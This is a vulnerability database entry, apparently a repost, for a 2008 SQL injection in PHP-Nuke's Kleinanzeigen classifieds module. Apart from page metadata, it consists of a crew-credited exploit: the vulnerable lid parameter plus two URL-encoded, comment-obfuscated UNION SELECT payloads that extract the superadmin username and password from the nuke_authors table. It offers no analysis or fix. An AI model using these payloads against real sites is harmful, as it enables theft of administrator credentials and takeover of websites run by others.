PHP-NUKE module Kleinanzeigen SQL injection (lid)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052580 漏洞类型
发布时间 2008-08-06 更新时间 2008-08-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008080016
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 ##########################################################
#   Rbt-4 crew
#  http://www.rbt-4.net
#   Author : Lovebug
#----------------------------
#
#
#   Remote Sql injection Php-Nuke module name Kleinanzeigen 
##########################################################
# modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql]
# 
#                         Exploit 
#
# username :  -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
# pwd : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
##########################################################